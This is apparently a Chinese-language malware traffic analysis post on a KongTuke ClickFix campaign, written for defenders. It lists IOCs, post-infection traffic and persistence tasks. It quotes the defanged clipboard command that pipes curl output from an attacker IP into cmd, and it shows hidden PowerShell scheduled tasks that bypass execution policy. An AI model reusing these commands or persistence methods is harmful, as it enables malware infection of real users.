2026年1月8日（星期四）：KongTuke ClickFix 活动

通知： 压缩文件受密码保护。请注意，本网站已启用新的密码方案。密码请参见本网站的“关于”页面。

关联文件：

• 2026-01-08-IOCs-from-KongTuke-activity.txt.zip - 2.5 kB (2,480 字节)
• 2026-01-08-KongTuke-example-of-HTTPS-URLs-for-ClickFix-page.zip - 119.5 kB (119,465 字节)
• 2026-01-08-KongTuke-activity-part-1-of-2.pcap.zip - 31.8 MB (31,824,522 字节)
• 2026-01-08-KongTuke-activity-part-2-of-2.pcap.zip - 221.8 MB (221,802,085 字节)
• 2026-01-08-malware-and-artifacts-from-KongTuke-infection.zip - 231.1 MB (231,143,160 字节)

笔记：

• 此分析是在我实验室的域控制器上使用 furtherningthemagic[.]com 域名进行的。
• 我所使用的 furtherningthemagic[.]com 域名在此活动发生时尚未注册。
• 我修改了数据包捕获文件以隐藏受感染主机的实际位置和特征。

注入恶意脚本的合法（但已遭入侵）网站示例：

• [信息已移除]

KongTuke ClickFix 验证码页面的流量示例：

• hxxps[:]//frttsch[.]com/2w2w.js
• hxxps[:]//frttsch[.]com/js.php?device=windows&ip=[base64 text removed]&refferer=[base64 text removed]&browser=[base64 text removed]&ua=[base64 text removed]&domain=[base64 text removed]&loc=[base64 text removed]=&is_ajax=1

注入访问者剪贴板的 ClickFix 脚本：

• cmd.exe /c start "" /min cmd /k "curl hxxp[:]//144.31.221[.]60/a | cmd && exit"

感染后流量：

• 15:54:44 UTC - 144.31[.]221.60:80 - 144.31[.]221.60 - GET /a
• 15:54:45 UTC - 144.31[.]221.60:80 - 144.31[.]221.60 - GET /b
• 15:54:51 UTC - 144.31[.]221.60:80 - 144.31[.]221.60 - POST /n
• 15:54:52 UTC - 64.95.13[.]101:80 - 64.95.13[.]101 - GET /jdf7r4egas5.html
• 15:54:52 UTC - 144.31.221[.]71:80 - 144.31.221[.]71 - GET /final10
• 15:55:07 UTC - 104.16.230[.]132:80 - combining-space-organization-correction.trycloudflare.com - POST /qFiwVIIzHUzJFR
• 15:55:29 UTC - 103.27.157[.]146:4444 - TCP 流量
• 16:05:56 UTC - 103.27.157[.]146:4444 - TCP 流量
• 16:08:24 UTC - 64.190.113[.]206:79 - checkifhuman[.]top - 使用 Finger 协议的流量
• 16:12:49 UTC - 64.52.80.153:80 - ey267te[.]top - GET /1.php?s=63e95be1-92e0-45c1-a928-65d63b17cd1c
• 16:12:50 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /1.php?s=04e1ab2b-3f93-46fa-9aed-c3a2a3f126c9
• 16:12:51 UTC - 64.52.80.153:80 - fnjnbehjangelkd[.]top - GET /txoidka8bfhtr.php?[受害者主机名]&key=43333495587&s=63e95be1-92e0-45c1-a928-65d63b17cd1c
• 16:13:00 UTC - 173.232.146[.]62:25658 - TLSv1.0 流量
• 16:13:01 UTC - api.ipify[.]org - HTTPS 流量
• 16:13:03 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /st2?s=04e1ab2b-3f93-46fa-9aed-c3a2a3f126c9&id=[受害者主机名]&key=[11位数字字符串]
• 16:13:04 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /getarchive
• 16:13:35 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /installreport?r=0&hash=1DD91BA2F56CED5AF731E67121619D6A9EF2CBB8F1524989FC542EF904605908
• 16:13:35 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /archivehash
• 16:13:36 UTC - 45.61.136[.]222:80 - bz1d0zvfi03yhn1[.]top - GET /installreport?r=0&hash=1DD91BA2F56CED5AF731E67121619D6A9EF2CBB8F1524989FC542EF904605908
• 16:16:12 UTC - 173.232.146[.]62:25658 - TLSv1.0 流量
• 16:16:13 UTC - api.ipify[.]org - HTTPS 流量
• 16:16:15 UTC - 173.232.146[.]62:25658 - TLSv1.0 流量
• 16:16:16 UTC - 173.232.146[.]62:25658 - TLSv1.0 流量
• 16:16:21 UTC - checkip.dyndns[.]org - GET /
• 16:16:21 UTC - ipinfo[.]io - GET /[受害者IP地址]/city
• 16:16:21 UTC - ipinfo[.]io - GET /[受害者IP地址]/region
• 16:16:21 UTC - ipinfo[.]io - GET /[受害者IP地址]/country
• 16:16:28 UTC - 173.232.146[.]62:25658 - TLSv1.0 流量

初始下载的 ZIP 压缩包：

• SHA256 哈希值：d22b9d30b89d99ad80d1ee081fd20518985c1bc4e37b5e105bcc52231509fa25
• 文件大小：25，469，825 字节
• 文件类型：Zip 归档数据，至少需要 v2.0 版本解压，压缩方法=deflate
• 文件位置：hxxp[:]//144.31.221[.]71/final10
• 解压路径：C:\Users\[username]\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\
• 描述：恶意的 Python 包
• 首次提交至 VirusTotal：2026-01-08

后续下载的 ZIP 压缩包：

• SHA256 哈希值：1dd91ba2f56ced5af731e67121619d6a9ef2cbb8f1524989fc542ef904605908
• 文件大小：205，346，282 字节
• 文件类型：Zip 归档数据，至少需要 v2.0 版本解压，压缩方法=deflate
• 文件位置：hxxp[:]//bz1d0zvfi03yhn1[.]top/getarchive
• 解压路径：C:\Users\[username]\AppData\Roaming\figmaUpdater\
• 描述：恶意的 Figma 包
• 首次提交至 VirusTotal：2025-10-09

用于维持恶意软件持久性的计划任务：

• 任务名称： SoftwareProtection
  • 触发器： 安装/运行后，之后每隔 5 分钟无限期重复
  • 命令： C:\Users\gtimmons\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\run.exe
  • 参数： C:\Users\gtimmons\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\udp.pyw
• 任务名称： Remove-NetNatStaticMapping
  • 触发器： 安装/运行后，之后每隔 3 分钟无限期重复
  • 命令： conhost
  • 参数： --headless powershell -ep bypass /f "C:\Users\[username]\AppData\Local\Microsoft\AppActions\AzureRemove-NetNatStaticMapping.ps1"

第二个计划任务引用的目录中的文件：

• SQLite 3.x 数据库：C:\Users\[username]\AppData\Local\Microsoft\AppActions\ActionFXCache.db
• 数据文件：C:\Users\[username]\AppData\Local\Microsoft\AppActions\ActionFXCache.db-shm
• SQLite 预写日志：C:\Users\[username]\AppData\Local\Microsoft\AppActions\ActionFXCache.db-wal
• ASCII 文本文件：C:\Users\[username]\AppData\Local\Microsoft\AppActions\AzureRemove-NetNatStaticMapping.ps1
• 数据文件：C:\Users\[username]\AppData\Local\Microsoft\AppActions\Remove-NetNatStaticMapping.log

在此次感染过程中创建的其他包含内容的目录：

• C:\Users\[username]\AppData\Roaming\figmaUpdater\
• C:\Users\[username]\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\

图片 上图：访问合法但已遭入侵的网站后出现的虚假 CAPTCHA 窗口和 ClickFix 脚本。

上图：在 Wireshark 中过滤出的感染流量，第 1 部分（共 2 部分）。

上图：在 Wireshark 中过滤出的感染流量，第 2 部分（共 2 部分）。

上图：初始感染过程中创建的计划任务。

上图：后续感染过程中创建的计划任务。

单击此处返回主页。